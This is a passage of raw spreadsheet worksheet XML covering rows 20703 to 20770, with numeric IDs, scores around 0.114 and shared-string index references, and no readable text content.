      <c r="C20703" s="2" t="s">
        <v>19977</v>
      </c>
      <c r="D20703" s="2">
        <v>1.0</v>
      </c>
      <c r="E20703" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20703" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20704" ht="15.75" customHeight="1">
      <c r="A20704" s="1">
        <v>16678.0</v>
      </c>
      <c r="B20704" s="2">
        <v>4.7293097E7</v>
      </c>
      <c r="C20704" s="2" t="s">
        <v>19978</v>
      </c>
      <c r="D20704" s="2">
        <v>1.0</v>
      </c>
      <c r="E20704" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20704" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20705" ht="15.75" customHeight="1">
      <c r="A20705" s="1">
        <v>16946.0</v>
      </c>
      <c r="B20705" s="2">
        <v>4.8225188E7</v>
      </c>
      <c r="C20705" s="2" t="s">
        <v>19979</v>
      </c>
      <c r="D20705" s="2">
        <v>1.0</v>
      </c>
      <c r="E20705" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20705" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20706" ht="15.75" customHeight="1">
      <c r="A20706" s="1">
        <v>17106.0</v>
      </c>
      <c r="B20706" s="2">
        <v>4.869804E7</v>
      </c>
      <c r="C20706" s="2" t="s">
        <v>19980</v>
      </c>
      <c r="D20706" s="2">
        <v>1.0</v>
      </c>
      <c r="E20706" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20706" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20707" ht="15.75" customHeight="1">
      <c r="A20707" s="1">
        <v>17271.0</v>
      </c>
      <c r="B20707" s="2">
        <v>4.9175227E7</v>
      </c>
      <c r="C20707" s="2" t="s">
        <v>19981</v>
      </c>
      <c r="D20707" s="2">
        <v>1.0</v>
      </c>
      <c r="E20707" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20707" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20708" ht="15.75" customHeight="1">
      <c r="A20708" s="1">
        <v>17581.0</v>
      </c>
      <c r="B20708" s="2">
        <v>5.0266539E7</v>
      </c>
      <c r="C20708" s="2" t="s">
        <v>19982</v>
      </c>
      <c r="D20708" s="2">
        <v>1.0</v>
      </c>
      <c r="E20708" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20708" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20709" ht="15.75" customHeight="1">
      <c r="A20709" s="1">
        <v>17684.0</v>
      </c>
      <c r="B20709" s="2">
        <v>5.0496741E7</v>
      </c>
      <c r="C20709" s="2" t="s">
        <v>19983</v>
      </c>
      <c r="D20709" s="2">
        <v>1.0</v>
      </c>
      <c r="E20709" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20709" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20710" ht="15.75" customHeight="1">
      <c r="A20710" s="1">
        <v>17708.0</v>
      </c>
      <c r="B20710" s="2">
        <v>5.0595466E7</v>
      </c>
      <c r="C20710" s="2" t="s">
        <v>19984</v>
      </c>
      <c r="D20710" s="2">
        <v>1.0</v>
      </c>
      <c r="E20710" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20710" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20711" ht="15.75" customHeight="1">
      <c r="A20711" s="1">
        <v>18065.0</v>
      </c>
      <c r="B20711" s="2">
        <v>5.1608632E7</v>
      </c>
      <c r="C20711" s="2" t="s">
        <v>19985</v>
      </c>
      <c r="D20711" s="2">
        <v>1.0</v>
      </c>
      <c r="E20711" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20711" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20712" ht="15.75" customHeight="1">
      <c r="A20712" s="1">
        <v>18751.0</v>
      </c>
      <c r="B20712" s="2">
        <v>5.3784846E7</v>
      </c>
      <c r="C20712" s="2" t="s">
        <v>19935</v>
      </c>
      <c r="D20712" s="2">
        <v>1.0</v>
      </c>
      <c r="E20712" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20712" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20713" ht="15.75" customHeight="1">
      <c r="A20713" s="1">
        <v>18796.0</v>
      </c>
      <c r="B20713" s="2">
        <v>5.3846413E7</v>
      </c>
      <c r="C20713" s="2" t="s">
        <v>19986</v>
      </c>
      <c r="D20713" s="2">
        <v>1.0</v>
      </c>
      <c r="E20713" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20713" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20714" ht="15.75" customHeight="1">
      <c r="A20714" s="1">
        <v>18950.0</v>
      </c>
      <c r="B20714" s="2">
        <v>5.4345333E7</v>
      </c>
      <c r="C20714" s="2" t="s">
        <v>19936</v>
      </c>
      <c r="D20714" s="2">
        <v>1.0</v>
      </c>
      <c r="E20714" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20714" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20715" ht="15.75" customHeight="1">
      <c r="A20715" s="1">
        <v>19097.0</v>
      </c>
      <c r="B20715" s="2">
        <v>5.4680115E7</v>
      </c>
      <c r="C20715" s="2" t="s">
        <v>19987</v>
      </c>
      <c r="D20715" s="2">
        <v>1.0</v>
      </c>
      <c r="E20715" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20715" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20716" ht="15.75" customHeight="1">
      <c r="A20716" s="1">
        <v>19595.0</v>
      </c>
      <c r="B20716" s="2">
        <v>5.6174528E7</v>
      </c>
      <c r="C20716" s="2" t="s">
        <v>19988</v>
      </c>
      <c r="D20716" s="2">
        <v>1.0</v>
      </c>
      <c r="E20716" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20716" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20717" ht="15.75" customHeight="1">
      <c r="A20717" s="1">
        <v>19733.0</v>
      </c>
      <c r="B20717" s="2">
        <v>5.6629299E7</v>
      </c>
      <c r="C20717" s="2" t="s">
        <v>19989</v>
      </c>
      <c r="D20717" s="2">
        <v>1.0</v>
      </c>
      <c r="E20717" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20717" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20718" ht="15.75" customHeight="1">
      <c r="A20718" s="1">
        <v>20167.0</v>
      </c>
      <c r="B20718" s="2">
        <v>1.0406897E7</v>
      </c>
      <c r="C20718" s="2" t="s">
        <v>19990</v>
      </c>
      <c r="D20718" s="2">
        <v>1.0</v>
      </c>
      <c r="E20718" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20718" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20719" ht="15.75" customHeight="1">
      <c r="A20719" s="1">
        <v>20719.0</v>
      </c>
      <c r="B20719" s="2">
        <v>1.4649861E7</v>
      </c>
      <c r="C20719" s="2" t="s">
        <v>19991</v>
      </c>
      <c r="D20719" s="2">
        <v>1.0</v>
      </c>
      <c r="E20719" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20719" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20720" ht="15.75" customHeight="1">
      <c r="A20720" s="1">
        <v>21154.0</v>
      </c>
      <c r="B20720" s="2">
        <v>1.8863235E7</v>
      </c>
      <c r="C20720" s="2" t="s">
        <v>19992</v>
      </c>
      <c r="D20720" s="2">
        <v>1.0</v>
      </c>
      <c r="E20720" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20720" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20721" ht="15.75" customHeight="1">
      <c r="A20721" s="1">
        <v>22090.0</v>
      </c>
      <c r="B20721" s="2">
        <v>3.0765717E7</v>
      </c>
      <c r="C20721" s="2" t="s">
        <v>19992</v>
      </c>
      <c r="D20721" s="2">
        <v>1.0</v>
      </c>
      <c r="E20721" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20721" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20722" ht="15.75" customHeight="1">
      <c r="A20722" s="1">
        <v>25324.0</v>
      </c>
      <c r="B20722" s="2">
        <v>1.3447317E7</v>
      </c>
      <c r="C20722" s="2" t="s">
        <v>19993</v>
      </c>
      <c r="D20722" s="2">
        <v>1.0</v>
      </c>
      <c r="E20722" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20722" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20723" ht="15.75" customHeight="1">
      <c r="A20723" s="1">
        <v>25765.0</v>
      </c>
      <c r="B20723" s="2">
        <v>1.464986E7</v>
      </c>
      <c r="C20723" s="2" t="s">
        <v>19991</v>
      </c>
      <c r="D20723" s="2">
        <v>1.0</v>
      </c>
      <c r="E20723" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20723" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20724" ht="15.75" customHeight="1">
      <c r="A20724" s="1">
        <v>26142.0</v>
      </c>
      <c r="B20724" s="2">
        <v>1.6039151E7</v>
      </c>
      <c r="C20724" s="2" t="s">
        <v>19994</v>
      </c>
      <c r="D20724" s="2">
        <v>1.0</v>
      </c>
      <c r="E20724" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20724" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20725" ht="15.75" customHeight="1">
      <c r="A20725" s="1">
        <v>26927.0</v>
      </c>
      <c r="B20725" s="2">
        <v>1.9464056E7</v>
      </c>
      <c r="C20725" s="2" t="s">
        <v>19995</v>
      </c>
      <c r="D20725" s="2">
        <v>1.0</v>
      </c>
      <c r="E20725" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20725" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20726" ht="15.75" customHeight="1">
      <c r="A20726" s="1">
        <v>27593.0</v>
      </c>
      <c r="B20726" s="2">
        <v>2.2561374E7</v>
      </c>
      <c r="C20726" s="2" t="s">
        <v>19996</v>
      </c>
      <c r="D20726" s="2">
        <v>1.0</v>
      </c>
      <c r="E20726" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20726" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20727" ht="15.75" customHeight="1">
      <c r="A20727" s="1">
        <v>28083.0</v>
      </c>
      <c r="B20727" s="2">
        <v>2.4629072E7</v>
      </c>
      <c r="C20727" s="2" t="s">
        <v>19997</v>
      </c>
      <c r="D20727" s="2">
        <v>1.0</v>
      </c>
      <c r="E20727" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20727" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20728" ht="15.75" customHeight="1">
      <c r="A20728" s="1">
        <v>30266.0</v>
      </c>
      <c r="B20728" s="2">
        <v>3.765069E7</v>
      </c>
      <c r="C20728" s="2" t="s">
        <v>19998</v>
      </c>
      <c r="D20728" s="2">
        <v>1.0</v>
      </c>
      <c r="E20728" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20728" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20729" ht="15.75" customHeight="1">
      <c r="A20729" s="1">
        <v>30963.0</v>
      </c>
      <c r="B20729" s="2">
        <v>4.7438104E7</v>
      </c>
      <c r="C20729" s="2" t="s">
        <v>19999</v>
      </c>
      <c r="D20729" s="2">
        <v>1.0</v>
      </c>
      <c r="E20729" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20729" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20730" ht="15.75" customHeight="1">
      <c r="A20730" s="1">
        <v>31116.0</v>
      </c>
      <c r="B20730" s="2">
        <v>4.8782406E7</v>
      </c>
      <c r="C20730" s="2" t="s">
        <v>20000</v>
      </c>
      <c r="D20730" s="2">
        <v>1.0</v>
      </c>
      <c r="E20730" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20730" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20731" ht="15.75" customHeight="1">
      <c r="A20731" s="1">
        <v>31554.0</v>
      </c>
      <c r="B20731" s="2">
        <v>5.1169085E7</v>
      </c>
      <c r="C20731" s="2" t="s">
        <v>20001</v>
      </c>
      <c r="D20731" s="2">
        <v>1.0</v>
      </c>
      <c r="E20731" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20731" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20732" ht="15.75" customHeight="1">
      <c r="A20732" s="1">
        <v>31558.0</v>
      </c>
      <c r="B20732" s="2">
        <v>5121405.0</v>
      </c>
      <c r="C20732" s="2" t="s">
        <v>20002</v>
      </c>
      <c r="D20732" s="2">
        <v>1.0</v>
      </c>
      <c r="E20732" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20732" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20733" ht="15.75" customHeight="1">
      <c r="A20733" s="1">
        <v>32011.0</v>
      </c>
      <c r="B20733" s="2">
        <v>5.3455305E7</v>
      </c>
      <c r="C20733" s="2" t="s">
        <v>20003</v>
      </c>
      <c r="D20733" s="2">
        <v>1.0</v>
      </c>
      <c r="E20733" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20733" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20734" ht="15.75" customHeight="1">
      <c r="A20734" s="1">
        <v>33276.0</v>
      </c>
      <c r="B20734" s="2">
        <v>7423298.0</v>
      </c>
      <c r="C20734" s="2" t="s">
        <v>20004</v>
      </c>
      <c r="D20734" s="2">
        <v>1.0</v>
      </c>
      <c r="E20734" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20734" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20735" ht="15.75" customHeight="1">
      <c r="A20735" s="1">
        <v>33962.0</v>
      </c>
      <c r="B20735" s="2">
        <v>9344592.0</v>
      </c>
      <c r="C20735" s="2" t="s">
        <v>20005</v>
      </c>
      <c r="D20735" s="2">
        <v>1.0</v>
      </c>
      <c r="E20735" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20735" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="20736" ht="15.75" customHeight="1">
      <c r="A20736" s="1">
        <v>3680.0</v>
      </c>
      <c r="B20736" s="2">
        <v>3.9464039E7</v>
      </c>
      <c r="C20736" s="2" t="s">
        <v>20006</v>
      </c>
      <c r="D20736" s="2">
        <v>1.0</v>
      </c>
      <c r="E20736" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20736" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="20737" ht="15.75" customHeight="1">
      <c r="A20737" s="1">
        <v>16458.0</v>
      </c>
      <c r="B20737" s="2">
        <v>4.6452429E7</v>
      </c>
      <c r="C20737" s="2" t="s">
        <v>20007</v>
      </c>
      <c r="D20737" s="2">
        <v>1.0</v>
      </c>
      <c r="E20737" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20737" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="20738" ht="15.75" customHeight="1">
      <c r="A20738" s="1">
        <v>2524.0</v>
      </c>
      <c r="B20738" s="2">
        <v>3.4034142E7</v>
      </c>
      <c r="C20738" s="2" t="s">
        <v>20008</v>
      </c>
      <c r="D20738" s="2">
        <v>1.0</v>
      </c>
      <c r="E20738" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20738" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="20739" ht="15.75" customHeight="1">
      <c r="A20739" s="1">
        <v>8234.0</v>
      </c>
      <c r="B20739" s="2">
        <v>5335551.0</v>
      </c>
      <c r="C20739" s="2" t="s">
        <v>20009</v>
      </c>
      <c r="D20739" s="2">
        <v>1.0</v>
      </c>
      <c r="E20739" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20739" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="20740" ht="15.75" customHeight="1">
      <c r="A20740" s="1">
        <v>12752.0</v>
      </c>
      <c r="B20740" s="2">
        <v>3.1125862E7</v>
      </c>
      <c r="C20740" s="2" t="s">
        <v>20010</v>
      </c>
      <c r="D20740" s="2">
        <v>1.0</v>
      </c>
      <c r="E20740" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20740" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="20741" ht="15.75" customHeight="1">
      <c r="A20741" s="1">
        <v>30082.0</v>
      </c>
      <c r="B20741" s="2">
        <v>3632558.0</v>
      </c>
      <c r="C20741" s="2" t="s">
        <v>20011</v>
      </c>
      <c r="D20741" s="2">
        <v>1.0</v>
      </c>
      <c r="E20741" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20741" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="20742" ht="15.75" customHeight="1">
      <c r="A20742" s="1">
        <v>3215.0</v>
      </c>
      <c r="B20742" s="2">
        <v>3.730233E7</v>
      </c>
      <c r="C20742" s="2" t="s">
        <v>20012</v>
      </c>
      <c r="D20742" s="2">
        <v>1.0</v>
      </c>
      <c r="E20742" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20742" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="20743" ht="15.75" customHeight="1">
      <c r="A20743" s="1">
        <v>26976.0</v>
      </c>
      <c r="B20743" s="2">
        <v>1.9708989E7</v>
      </c>
      <c r="C20743" s="2" t="s">
        <v>20013</v>
      </c>
      <c r="D20743" s="2">
        <v>1.0</v>
      </c>
      <c r="E20743" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20743" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="20744" ht="15.75" customHeight="1">
      <c r="A20744" s="1">
        <v>1868.0</v>
      </c>
      <c r="B20744" s="2">
        <v>2.9597812E7</v>
      </c>
      <c r="C20744" s="2" t="s">
        <v>20014</v>
      </c>
      <c r="D20744" s="2">
        <v>1.0</v>
      </c>
      <c r="E20744" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20744" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="20745" ht="15.75" customHeight="1">
      <c r="A20745" s="1">
        <v>2834.0</v>
      </c>
      <c r="B20745" s="2">
        <v>3.5419314E7</v>
      </c>
      <c r="C20745" s="2" t="s">
        <v>20015</v>
      </c>
      <c r="D20745" s="2">
        <v>1.0</v>
      </c>
      <c r="E20745" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20745" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="20746" ht="15.75" customHeight="1">
      <c r="A20746" s="1">
        <v>7921.0</v>
      </c>
      <c r="B20746" s="2">
        <v>5.2538518E7</v>
      </c>
      <c r="C20746" s="2" t="s">
        <v>20016</v>
      </c>
      <c r="D20746" s="2">
        <v>1.0</v>
      </c>
      <c r="E20746" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20746" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="20747" ht="15.75" customHeight="1">
      <c r="A20747" s="1">
        <v>10533.0</v>
      </c>
      <c r="B20747" s="2">
        <v>1.2340249E7</v>
      </c>
      <c r="C20747" s="2" t="s">
        <v>20017</v>
      </c>
      <c r="D20747" s="2">
        <v>1.0</v>
      </c>
      <c r="E20747" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20747" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="20748" ht="15.75" customHeight="1">
      <c r="A20748" s="1">
        <v>11330.0</v>
      </c>
      <c r="B20748" s="2">
        <v>2.1143076E7</v>
      </c>
      <c r="C20748" s="2" t="s">
        <v>20018</v>
      </c>
      <c r="D20748" s="2">
        <v>1.0</v>
      </c>
      <c r="E20748" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20748" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="20749" ht="15.75" customHeight="1">
      <c r="A20749" s="1">
        <v>4601.0</v>
      </c>
      <c r="B20749" s="2">
        <v>4.2829718E7</v>
      </c>
      <c r="C20749" s="2" t="s">
        <v>20019</v>
      </c>
      <c r="D20749" s="2">
        <v>1.0</v>
      </c>
      <c r="E20749" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20749" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="20750" ht="15.75" customHeight="1">
      <c r="A20750" s="1">
        <v>7949.0</v>
      </c>
      <c r="B20750" s="2">
        <v>5.26438E7</v>
      </c>
      <c r="C20750" s="2" t="s">
        <v>20020</v>
      </c>
      <c r="D20750" s="2">
        <v>1.0</v>
      </c>
      <c r="E20750" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20750" s="2">
        <v>0.1139359698681732</v>
      </c>
    </row>
    <row r="20751" ht="15.75" customHeight="1">
      <c r="A20751" s="1">
        <v>9373.0</v>
      </c>
      <c r="B20751" s="2">
        <v>5.5698477E7</v>
      </c>
      <c r="C20751" s="2" t="s">
        <v>20021</v>
      </c>
      <c r="D20751" s="2">
        <v>1.0</v>
      </c>
      <c r="E20751" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20751" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="20752" ht="15.75" customHeight="1">
      <c r="A20752" s="1">
        <v>12428.0</v>
      </c>
      <c r="B20752" s="2">
        <v>2.9190898E7</v>
      </c>
      <c r="C20752" s="2" t="s">
        <v>20022</v>
      </c>
      <c r="D20752" s="2">
        <v>1.0</v>
      </c>
      <c r="E20752" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20752" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="20753" ht="15.75" customHeight="1">
      <c r="A20753" s="1">
        <v>6249.0</v>
      </c>
      <c r="B20753" s="2">
        <v>4.8103802E7</v>
      </c>
      <c r="C20753" s="2" t="s">
        <v>20023</v>
      </c>
      <c r="D20753" s="2">
        <v>1.0</v>
      </c>
      <c r="E20753" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20753" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="20754" ht="15.75" customHeight="1">
      <c r="A20754" s="1">
        <v>33933.0</v>
      </c>
      <c r="B20754" s="2">
        <v>9282483.0</v>
      </c>
      <c r="C20754" s="2" t="s">
        <v>20024</v>
      </c>
      <c r="D20754" s="2">
        <v>1.0</v>
      </c>
      <c r="E20754" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20754" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="20755" ht="15.75" customHeight="1">
      <c r="A20755" s="1">
        <v>8796.0</v>
      </c>
      <c r="B20755" s="2">
        <v>5.4602578E7</v>
      </c>
      <c r="C20755" s="2" t="s">
        <v>20025</v>
      </c>
      <c r="D20755" s="2">
        <v>1.0</v>
      </c>
      <c r="E20755" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20755" s="2">
        <v>0.1138433515482695</v>
      </c>
    </row>
    <row r="20756" ht="15.75" customHeight="1">
      <c r="A20756" s="1">
        <v>17222.0</v>
      </c>
      <c r="B20756" s="2">
        <v>4.9064688E7</v>
      </c>
      <c r="C20756" s="2" t="s">
        <v>20026</v>
      </c>
      <c r="D20756" s="2">
        <v>1.0</v>
      </c>
      <c r="E20756" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20756" s="2">
        <v>0.1138433515482695</v>
      </c>
    </row>
    <row r="20757" ht="15.75" customHeight="1">
      <c r="A20757" s="1">
        <v>14305.0</v>
      </c>
      <c r="B20757" s="2">
        <v>3.8611987E7</v>
      </c>
      <c r="C20757" s="2" t="s">
        <v>20027</v>
      </c>
      <c r="D20757" s="2">
        <v>1.0</v>
      </c>
      <c r="E20757" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20757" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="20758" ht="15.75" customHeight="1">
      <c r="A20758" s="1">
        <v>30676.0</v>
      </c>
      <c r="B20758" s="2">
        <v>4.2246074E7</v>
      </c>
      <c r="C20758" s="2" t="s">
        <v>20028</v>
      </c>
      <c r="D20758" s="2">
        <v>1.0</v>
      </c>
      <c r="E20758" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20758" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="20759" ht="15.75" customHeight="1">
      <c r="A20759" s="1">
        <v>3736.0</v>
      </c>
      <c r="B20759" s="2">
        <v>3.9661118E7</v>
      </c>
      <c r="C20759" s="2" t="s">
        <v>20029</v>
      </c>
      <c r="D20759" s="2">
        <v>1.0</v>
      </c>
      <c r="E20759" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20759" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20760" ht="15.75" customHeight="1">
      <c r="A20760" s="1">
        <v>7296.0</v>
      </c>
      <c r="B20760" s="2">
        <v>5.0829001E7</v>
      </c>
      <c r="C20760" s="2" t="s">
        <v>20030</v>
      </c>
      <c r="D20760" s="2">
        <v>1.0</v>
      </c>
      <c r="E20760" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20760" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20761" ht="15.75" customHeight="1">
      <c r="A20761" s="1">
        <v>7354.0</v>
      </c>
      <c r="B20761" s="2">
        <v>5.099071E7</v>
      </c>
      <c r="C20761" s="2" t="s">
        <v>20031</v>
      </c>
      <c r="D20761" s="2">
        <v>1.0</v>
      </c>
      <c r="E20761" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20761" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20762" ht="15.75" customHeight="1">
      <c r="A20762" s="1">
        <v>7938.0</v>
      </c>
      <c r="B20762" s="2">
        <v>5.2596484E7</v>
      </c>
      <c r="C20762" s="2" t="s">
        <v>20032</v>
      </c>
      <c r="D20762" s="2">
        <v>1.0</v>
      </c>
      <c r="E20762" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20762" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20763" ht="15.75" customHeight="1">
      <c r="A20763" s="1">
        <v>9253.0</v>
      </c>
      <c r="B20763" s="2">
        <v>5.5476671E7</v>
      </c>
      <c r="C20763" s="2" t="s">
        <v>20033</v>
      </c>
      <c r="D20763" s="2">
        <v>1.0</v>
      </c>
      <c r="E20763" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20763" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20764" ht="15.75" customHeight="1">
      <c r="A20764" s="1">
        <v>10779.0</v>
      </c>
      <c r="B20764" s="2">
        <v>1.565599E7</v>
      </c>
      <c r="C20764" s="2" t="s">
        <v>20034</v>
      </c>
      <c r="D20764" s="2">
        <v>1.0</v>
      </c>
      <c r="E20764" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20764" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20765" ht="15.75" customHeight="1">
      <c r="A20765" s="1">
        <v>14828.0</v>
      </c>
      <c r="B20765" s="2">
        <v>4.1011757E7</v>
      </c>
      <c r="C20765" s="2" t="s">
        <v>20035</v>
      </c>
      <c r="D20765" s="2">
        <v>1.0</v>
      </c>
      <c r="E20765" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20765" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20766" ht="15.75" customHeight="1">
      <c r="A20766" s="1">
        <v>20115.0</v>
      </c>
      <c r="B20766" s="2">
        <v>4947870.0</v>
      </c>
      <c r="C20766" s="2" t="s">
        <v>20036</v>
      </c>
      <c r="D20766" s="2">
        <v>1.0</v>
      </c>
      <c r="E20766" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20766" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20767" ht="15.75" customHeight="1">
      <c r="A20767" s="1">
        <v>23728.0</v>
      </c>
      <c r="B20767" s="2">
        <v>7247186.0</v>
      </c>
      <c r="C20767" s="2" t="s">
        <v>20037</v>
      </c>
      <c r="D20767" s="2">
        <v>1.0</v>
      </c>
      <c r="E20767" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20767" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20768" ht="15.75" customHeight="1">
      <c r="A20768" s="1">
        <v>25566.0</v>
      </c>
      <c r="B20768" s="2">
        <v>1.4316959E7</v>
      </c>
      <c r="C20768" s="2" t="s">
        <v>20038</v>
      </c>
      <c r="D20768" s="2">
        <v>1.0</v>
      </c>
      <c r="E20768" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20768" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="20769" ht="15.75" customHeight="1">
      <c r="A20769" s="1">
        <v>2483.0</v>
      </c>
      <c r="B20769" s="2">
        <v>3.3858793E7</v>
      </c>
      <c r="C20769" s="2" t="s">
        <v>20039</v>
      </c>
      <c r="D20769" s="2">
        <v>1.0</v>
      </c>
      <c r="E20769" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20769" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="20770" ht="15.75" customHeight="1">
      <c r="A20770" s="1">
        <v>24948.0</v>
      </c>
      <c r="B20770" s="2">
        <v>1.2538901E7</v>
      </c>
